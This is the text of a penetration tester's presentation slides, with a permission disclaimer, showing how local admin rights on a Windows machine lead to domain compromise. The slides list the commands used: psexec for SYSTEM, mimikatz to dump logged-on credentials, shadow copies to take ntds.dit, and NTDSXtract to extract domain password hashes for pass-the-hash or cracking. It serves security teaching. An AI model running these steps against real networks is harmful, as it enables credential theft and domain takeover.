fall of a domain | from local admin to domain user hashes

LOCAL ADMIN TO DOMAIN USER HASHES

The Fall of a Domain

Riyaz Wa l i kar

Disclaimer

It was far more painstaking and complicated than this!

Demo setup to show execution path

All the commands were actually used in the pentest

Please do not try this on your office/corporate environment without written permission

Please exercise caution!

The story so far

Remote RDP access to a machine on the client network via VPN

Local Administrator rights to simulate an employee

User is a limited domain user

Domain controller on the same network, reachable with LDAP services running

Visually. This.

Local Admin eh?

Locally logged in as TARDIS\fwhite

Domain limited user but local admin

Other users connected? [Task Manager > Users]

Found another user connected to our system via RDP –sweet! (possibly domain admin )

Need system privs! Any ideas?

Think Sysinternals!

psexec –s –i cmd.exe

Dump connected user credentials

mimikatz – Benjamin Delpy

Extracts plaintext passwords from memory

Wdigest, tspkg, kerberos and many more

mimikatz privilege::debug token::elevate sekurlsa::logonPasswords

Windows (In)Security?

Now what?

http://gapingvoid.com/2008/06/13/now-what/

Remote CMD anyone?

RDP directly!

Lets be discreet

psexec -s –u TARDIS\atomboy \\10.10.10.1 cmd.exe

Game already over!

Instead RDP with user credentials and present report

Lets grab some hashes

Active Directory stores user information in %systemroot%\ntds\ntds.dit

Locked during system usage

ntdsutil + snapshot = backup (> Windows 2008)

vssadmin create shadow /for=C: (> Windows 2003)

Lets grab some hashes

backup readable by nt authority\system and administrators

We need the ntds.dit and SYSTEM files

cd / dir /other inbuilt cmd commands do not work on unmounted volume shadow copies

copy works!

Core files needed

NTDS.dit structure parse?

NTDSXtract - A framework for offline forensic analysis of ntds.dit

Need the libesedb module as well

libesedb and creddump in ntds_dump_hashes.zip

wget to a linux box (Kali is a good choice)

get framework + compile + make + run

wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip

wget http://ntdsxtract.com/downloads/ntds_dump_hash.zip

unzip both

get framework + compile + make + run

cd ntds_dump_hash/libesedb

./configure && make

cd libesedb/esedbtools

./esedbexport -l /tmp/ntds.log <ntds.dit>

Yay!

python ../../ntdsxtract/dsusers.py datatable link_table --passwordhashes <system_file> –passwordhistory <system_file>

Cleanup the output with ntdstopwdump.py(https://raw.github.com/inquisb/

miscellaneous/master/ntdstopwdump.py)

Now what?

http://gapingvoid.com/2008/06/13/now-what/

Pass the hash / Password Cracking!

Use the Windows Credentials Editor – Amplia Security

Password Cracking >> Humla perhaps

References

http://blog.gentilkiwi.com/mimikatzhttp://www.ampliasecurity.com/research/

wcefaq.htmlhttp://bernardodamele.blogspot.in/2011/12/

dump-windows-password-hashes_16.html

Thank you

riyazwalikar@gmail.comhttp://www.riyazwalikar.com